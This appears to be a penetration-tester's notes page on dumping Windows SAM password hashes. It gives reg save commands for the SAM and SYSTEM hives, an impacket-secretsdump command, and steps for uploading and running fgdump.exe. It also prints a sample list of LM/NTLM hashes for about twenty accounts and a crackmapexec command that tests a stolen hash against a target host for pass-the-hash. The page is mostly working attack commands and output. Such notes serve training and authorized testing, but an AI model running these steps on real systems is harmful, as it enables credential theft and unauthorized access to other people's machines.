Traditional dumping
In order to dump the same, two register keys must be retrieved:
1
2
reg save hklm\sam c:\sam
reg save hklm\system c:\system
You need to use impacket-secretsdump to retrieve hashes correctly (samdump2 is not useful here):
1
impacket-secretsdump -system system -sam sam LOCAL
Examples: Acute
fgdump.exe
Another way to extract the hashes (useful for older Windows versions) is fgdump executable, we only need to upload it to the server and run it, then upon succed a file will be generated:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
fgdump.exe
type 127.0.0.1.pwdump
admin:1007:A46139FEAAF2B9F117306D272A9441BB:C5E0002FDE3F5EB2CF5730FFEE58EBCC:::
Administrator:500:7BFD3EE62CBB0EBA886450C5D6C50F12:F3ACBE7EC27AADBE8DEEAA0C651A64AF:::
backup:1006:16AC416C2658E00DAAD3B435B51404EE:938DF8B296DD15D0DCE8EAA37BE593E0:::
david:1009:43AF16FFF22F1628AAD3B435B51404EE:1FBFF38CAE51E9918DA1FEC572F03E11:::
gary:1013:998D9DC042886317C72BEFE227197AE1:BA359FA9D25791C2180E424BB7BB0753:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
homer:1017:EF91A6D3CF901B8BAAD3B435B51404EE:B184D292A82B6AD35C3CFCA81F1F59BC:::
IUSR_SRV2:1020:F7D96EBCBE5B6BE3103CCB00190F6271:09FF503707453D56BB69F40BEF542DA0:::
IWAM_SRV2:1019:96FE1FC02D73A84C463DB170B09126F1:BE6EC26D0D71A533E14B65CE755D7BCE:::
john:1010:E52CAC67419A9A2238F10713B629B565:5835048CE94AD0564E29A924A03510EF:::
lee:1015:B096847EAD9B7476AAD3B435B51404EE:208ADB08381ADAB3032EEDBD35399642:::
lisa:1011:A179639DCAF4E1C4AAD3B435B51404EE:8ACF28FDC0168E003FB3E05BCB463D1B:::
mark:1012:6C3D4C343F999422AAD3B435B51404EE:BCD477BFDB45435A34C6A38403CA4364:::
ned:1016:836EDA0FBC609E6393E28745B8BF4BA6:4F16328129408ED105DEC3A938C266EB:::
nick:1014:59B8B93A9A6477E4AAD3B435B51404EE:EE28AD35A22C752C1A75BE3F9A7E82C9:::
simon:1008:598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF:::
sqlusr:1005:6307AB24156C541AAAD3B435B51404EE:6A370590BD44AC8E65D045254A170AB7:::
todd:1018:9E00B755E79C8CF95533B366E9511E4B:4150133921FE34DD2E777B1CA0361410:::
TsInternetUser:1000:E52CAC67419A9A22F96F275E1115B16F:E22E04519AA757D12F1219C4F31252F4:::
Then you can use the hash retrieved by using crackmapexec to check that indeed is a correct hash:
1
crackmapexec winrm 192.168.143.59 -u Administrator -p aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5 -d offsec.local
For further details about how to use this hash on a pass the hash attack please refer to [[Pass The Hash#^093000]]